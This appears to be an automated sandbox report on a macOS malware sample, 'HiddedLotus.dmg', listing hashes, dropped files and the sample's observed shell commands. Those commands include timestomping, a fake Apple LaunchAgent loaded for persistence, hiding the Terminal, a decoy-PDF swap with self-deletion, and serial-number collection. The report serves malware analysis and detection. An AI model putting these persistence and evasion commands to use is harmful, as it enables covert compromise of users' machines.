hiddenlotus | 7769af718266fcc91c9f39eb71d1b137156b95d6e6704d9b783988e3421ac656

Resubmissions

12-12-2023 00:29

231212-as16qabgfm 1

24-12-2021 12:50

211224-p27r7adafm 10

03-06-2021 16:18

210603-keq6dyat46 10

Analysis

max time kernel
125s
max time network
131s
platform
macos_amd64
resource
macos
submitted
24-12-2021 12:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HiddedLotus.dmg
Size

548KB
MD5

54f7eadddcae17f1cb10d0cdaf426408
SHA1

bda404cb5709a1f026c47a1c0508b2b753a47836
SHA256

7769af718266fcc91c9f39eb71d1b137156b95d6e6704d9b783988e3421ac656
SHA512

a1baa3532e2237a73e8ccc353b1e1de936ec49e2a3b995ae030092873f4f5bb74d7be47eb75e85a3da254f3d21c147e2327fa67b728e70ebe09d297ccc188179

Score

10^/10

hiddenlotus miner

Malware Config

Signatures

Hiddenlotus
Hiddenlotus family.
miner hiddenlotus

/bin/sh
sh -c "sudo open /Volumes/HiddedLotus/HiddedLotus.app"
1⤵
PID:624

/bin/bash
sh -c "sudo open /Volumes/HiddedLotus/HiddedLotus.app"
1⤵
PID:624

/usr/bin/sudo
sudo open /Volumes/HiddedLotus/HiddedLotus.app
1⤵
PID:624

/usr/bin/open
open /Volumes/HiddedLotus/HiddedLotus.app
2⤵
PID:625

/Volumes/HiddedLotus/HiddedLotus.app/Contents/MacOS/Lê Thu Hà (HAEDC)
"/Volumes/HiddedLotus/HiddedLotus.app/Contents/MacOS/Lê Thu Hà (HAEDC)"
1⤵
PID:626

/bin/sh
sh -c "osascript -e 'tell application \"Finder\"' -e 'set visible of process \"Terminal\" to false' -e 'end tell' > /dev/null 2>&1"
1⤵
PID:628

/bin/bash
sh -c "osascript -e 'tell application \"Finder\"' -e 'set visible of process \"Terminal\" to false' -e 'end tell' > /dev/null 2>&1"
1⤵
PID:628

/usr/bin/osascript
osascript -e "tell application \"Finder\"" -e "set visible of process \"Terminal\" to false" -e "end tell"
2⤵
PID:629

/bin/sh
sh -c "touch -t 1408241930 \"/Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd\" >/dev/null 2>&1"
1⤵
PID:630

/bin/bash
sh -c "touch -t 1408241930 \"/Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd\" >/dev/null 2>&1"
1⤵
PID:630

/usr/bin/touch
touch -t 1408241930 /Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd
2⤵
PID:631

/bin/sh
sh -c "touch -t 1408241930 \"/Users/run/Library/LaunchAgents/com.apple.hidd.shared.plist\" >/dev/null 2>&1"
1⤵
PID:632

/bin/bash
sh -c "touch -t 1408241930 \"/Users/run/Library/LaunchAgents/com.apple.hidd.shared.plist\" >/dev/null 2>&1"
1⤵
PID:632

/usr/bin/touch
touch -t 1408241930 /Users/run/Library/LaunchAgents/com.apple.hidd.shared.plist
2⤵
PID:633

/bin/sh
sh -c "launchctl load ~/Library/LaunchAgents/com.apple.hidd.shared.plist > /dev/null 2>&1 &"
1⤵
PID:634

/bin/sh
sh -c "mv -f \"/Volumes/HiddedLotus/HiddedLotus.app/Contents/Resources/configureDefault.sys\" \"/tmp/HiddedLotus.pdf\" > /dev/null 2>&1 ; open \"/tmp/HiddedLotus.pdf\" & > /dev/null 2>&1 ; rm -rf \"/Volumes/HiddedLotus/HiddedLotus.app\" > /dev/null 2>&1 ; cp -f \"/tmp/HiddedLotus.pdf\" \"/Volumes/HiddedLotus/HiddedLotus.pdf\" > /dev/null 2>&1 ; sleep 3 ; rm -rf \"/tmp/HiddedLotus.pdf\" > /dev/null 2>&1"
1⤵
PID:635

/bin/bash
sh -c "launchctl load ~/Library/LaunchAgents/com.apple.hidd.shared.plist > /dev/null 2>&1 &"
1⤵
PID:634

/bin/launchctl
launchctl load /Users/run/Library/LaunchAgents/com.apple.hidd.shared.plist
2⤵
PID:636

/bin/bash
sh -c "mv -f \"/Volumes/HiddedLotus/HiddedLotus.app/Contents/Resources/configureDefault.sys\" \"/tmp/HiddedLotus.pdf\" > /dev/null 2>&1 ; open \"/tmp/HiddedLotus.pdf\" & > /dev/null 2>&1 ; rm -rf \"/Volumes/HiddedLotus/HiddedLotus.app\" > /dev/null 2>&1 ; cp -f \"/tmp/HiddedLotus.pdf\" \"/Volumes/HiddedLotus/HiddedLotus.pdf\" > /dev/null 2>&1 ; sleep 3 ; rm -rf \"/tmp/HiddedLotus.pdf\" > /dev/null 2>&1"
1⤵
PID:635

/bin/mv
mv -f /Volumes/HiddedLotus/HiddedLotus.app/Contents/Resources/configureDefault.sys /tmp/HiddedLotus.pdf
2⤵
PID:637

/usr/bin/open
open /tmp/HiddedLotus.pdf
2⤵
PID:648

/bin/rm
rm -rf /Volumes/HiddedLotus/HiddedLotus.app
2⤵
PID:649

/bin/cp
cp -f /tmp/HiddedLotus.pdf /Volumes/HiddedLotus/HiddedLotus.pdf
2⤵
PID:650

/bin/sleep
sleep 3
2⤵
PID:652

/bin/rm
rm -rf /tmp/HiddedLotus.pdf
2⤵
PID:655

/usr/libexec/xpcproxy
xpcproxy com.apple.hidd.shared
1⤵
PID:638

/Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd
/Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd
1⤵
PID:638

/bin/sh
sh -c "ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split(\$0, line, \"\\\"\"); printf(\"%s\", line[4]); }' 2>&1"
1⤵
PID:639

/bin/bash
sh -c "ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split(\$0, line, \"\\\"\"); printf(\"%s\", line[4]); }' 2>&1"
1⤵
PID:639

/usr/sbin/ioreg
ioreg -rd1 -c IOPlatformExpertDevice
2⤵
PID:640

/usr/bin/awk
awk "/IOPlatformSerialNumber/ { split(\$0, line, \"\\\"\"); printf(\"%s\", line[4]); }"
2⤵
PID:641

/bin/sh
sh -c "touch -t 1302181440 \"/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync\" >/dev/null 2>&1"
1⤵
PID:642

/bin/bash
sh -c "touch -t 1302181440 \"/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync\" >/dev/null 2>&1"
1⤵
PID:642

/usr/bin/touch
touch -t 1302181440 "/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync"
2⤵
PID:643

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:644

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:644

/usr/bin/sw_vers
sw_vers -productVersion
2⤵
PID:645

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:646

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:646

/usr/bin/uname
uname -m
2⤵
PID:647

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:656

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:656

/usr/bin/sw_vers
sw_vers -productVersion
2⤵
PID:657

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:658

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:658

/usr/bin/uname
uname -m
2⤵
PID:659

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:662

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:662

/usr/bin/sw_vers
sw_vers -productVersion
2⤵
PID:663

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:664

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:664

/usr/bin/uname
uname -m
2⤵
PID:665

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:666

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:666

/usr/bin/sw_vers
sw_vers -productVersion
2⤵
PID:667

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:668

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:668

/usr/bin/uname
uname -m
2⤵
PID:669

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:670

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:670

/usr/bin/sw_vers
sw_vers -productVersion
2⤵
PID:671

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:672

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:672

/usr/bin/uname
uname -m
2⤵
PID:673

/bin/sh
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:674

/bin/bash
sh -c "sw_vers -productVersion 2>&1"
1⤵
PID:674

/usr/bin/sw_vers
sw_vers -productVersion
2⤵
PID:675

/bin/sh
sh -c "uname -m 2>&1"
1⤵
PID:676

/bin/bash
sh -c "uname -m 2>&1"
1⤵
PID:676

/usr/bin/uname
uname -m
2⤵
PID:677

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync
MD5
9fae344b7450fedb53ffccd22e653833

SHA1
9ed3258c2cc6b745aa6affc3d4023d0a5aba722a

SHA256
8b5eeaf24341dadc901740a0274881094b3a47a9e9aa3726fa784a89782b44bd

SHA512
d7eba41c51780c09c4162c752e655486fb3e8fce98a600b27c21516067e93d5cb73509a3470922a5fa5dfeedc249c4796cdc91ca98444cac2710a3edfc2e3b61

Download Submit
/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync
MD5
9fae344b7450fedb53ffccd22e653833

SHA1
9ed3258c2cc6b745aa6affc3d4023d0a5aba722a

SHA256
8b5eeaf24341dadc901740a0274881094b3a47a9e9aa3726fa784a89782b44bd

SHA512
d7eba41c51780c09c4162c752e655486fb3e8fce98a600b27c21516067e93d5cb73509a3470922a5fa5dfeedc249c4796cdc91ca98444cac2710a3edfc2e3b61

Download Submit
/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync
MD5
9fae344b7450fedb53ffccd22e653833

SHA1
9ed3258c2cc6b745aa6affc3d4023d0a5aba722a

SHA256
8b5eeaf24341dadc901740a0274881094b3a47a9e9aa3726fa784a89782b44bd

SHA512
d7eba41c51780c09c4162c752e655486fb3e8fce98a600b27c21516067e93d5cb73509a3470922a5fa5dfeedc249c4796cdc91ca98444cac2710a3edfc2e3b61

Download Submit
/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync
MD5
9fae344b7450fedb53ffccd22e653833

SHA1
9ed3258c2cc6b745aa6affc3d4023d0a5aba722a

SHA256
8b5eeaf24341dadc901740a0274881094b3a47a9e9aa3726fa784a89782b44bd

SHA512
d7eba41c51780c09c4162c752e655486fb3e8fce98a600b27c21516067e93d5cb73509a3470922a5fa5dfeedc249c4796cdc91ca98444cac2710a3edfc2e3b61

Download Submit
/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync
MD5
9fae344b7450fedb53ffccd22e653833

SHA1
9ed3258c2cc6b745aa6affc3d4023d0a5aba722a

SHA256
8b5eeaf24341dadc901740a0274881094b3a47a9e9aa3726fa784a89782b44bd

SHA512
d7eba41c51780c09c4162c752e655486fb3e8fce98a600b27c21516067e93d5cb73509a3470922a5fa5dfeedc249c4796cdc91ca98444cac2710a3edfc2e3b61

Download Submit
/Users/run/Library/Calendars/Calendar Sync Changes/Calendar Sync
MD5
9fae344b7450fedb53ffccd22e653833

SHA1
9ed3258c2cc6b745aa6affc3d4023d0a5aba722a

SHA256
8b5eeaf24341dadc901740a0274881094b3a47a9e9aa3726fa784a89782b44bd

SHA512
d7eba41c51780c09c4162c752e655486fb3e8fce98a600b27c21516067e93d5cb73509a3470922a5fa5dfeedc249c4796cdc91ca98444cac2710a3edfc2e3b61

Download Submit
/Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd
MD5
e7a0587c80f273b9444795947f034aab

SHA1
f07267c736886e4db05e5f1255c1a2afb111f606

SHA256
a7872fbf84513d1409ce6a13a718a9ff901b3dd92c1671a5ada13f871aaa9975

SHA512
a00325036b57bdb5a38e6aa1dd62e7a9e6b47f9f74b026a47258cea3b23b2c332e2e161e4afc9c8946d18a163232b64190c9d7f7220e5ea1ae8192d52e0f1f3b

Download Submit
/Users/run/Library/Containers/com.apple.lateragent/Data/Library/Preferences/hidd
MD5
e7a0587c80f273b9444795947f034aab

SHA1
f07267c736886e4db05e5f1255c1a2afb111f606

SHA256
a7872fbf84513d1409ce6a13a718a9ff901b3dd92c1671a5ada13f871aaa9975

SHA512
a00325036b57bdb5a38e6aa1dd62e7a9e6b47f9f74b026a47258cea3b23b2c332e2e161e4afc9c8946d18a163232b64190c9d7f7220e5ea1ae8192d52e0f1f3b

Download Submit
/Users/run/Library/LaunchAgents/com.apple.hidd.shared.plist
MD5
5005ec722c0e6c81918f10ee7bcd9eb3

SHA1
37b70a6c85ae3613a8b228e3bfbd013054c57656

SHA256
59477345fd7bcd56d23afbe7c75d098cccbf598d91d4b5a2ffc604ff53b27f9c

SHA512
39cf39a0d537ec4c90b5a06e5f04bfd264fce9f57656edb98f8c412c98c52c59ccc95ad82ae2e9af46256f276174c07b9659dd63b2a5e53b42d536a4d533cac3

Download Submit
/Volumes/HiddedLotus/HiddedLotus.pdf
MD5
f344d1b15be233d6fdc600d7aac76609

SHA1
3e9cebc29c7e95fb152a8a0c8fcbd4470c46aadb

SHA256
31f30c93721e9e5e483dd680d5aeff7e0863e2df925667ffd48e58eaf567212c

SHA512
482a26e51803845505e96136bcee47b2ac67b87f3eeb604d80177859fd59c60ff5e2eff0336b5b2a5c1f20fb24b9be0f1f132acc8185b3f7a476a158849e656c

Download Submit
/private/tmp/HiddedLotus.pdf
MD5
f344d1b15be233d6fdc600d7aac76609

SHA1
3e9cebc29c7e95fb152a8a0c8fcbd4470c46aadb

SHA256
31f30c93721e9e5e483dd680d5aeff7e0863e2df925667ffd48e58eaf567212c

SHA512
482a26e51803845505e96136bcee47b2ac67b87f3eeb604d80177859fd59c60ff5e2eff0336b5b2a5c1f20fb24b9be0f1f132acc8185b3f7a476a158849e656c

Download Submit
/private/tmp/HiddedLotus.pdf
MD5
f344d1b15be233d6fdc600d7aac76609

SHA1
3e9cebc29c7e95fb152a8a0c8fcbd4470c46aadb

SHA256
31f30c93721e9e5e483dd680d5aeff7e0863e2df925667ffd48e58eaf567212c

SHA512
482a26e51803845505e96136bcee47b2ac67b87f3eeb604d80177859fd59c60ff5e2eff0336b5b2a5c1f20fb24b9be0f1f132acc8185b3f7a476a158849e656c

Download Submit
/private/tmp/HiddedLotus.pdf
MD5
f344d1b15be233d6fdc600d7aac76609

SHA1
3e9cebc29c7e95fb152a8a0c8fcbd4470c46aadb

SHA256
31f30c93721e9e5e483dd680d5aeff7e0863e2df925667ffd48e58eaf567212c

SHA512
482a26e51803845505e96136bcee47b2ac67b87f3eeb604d80177859fd59c60ff5e2eff0336b5b2a5c1f20fb24b9be0f1f132acc8185b3f7a476a158849e656c

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads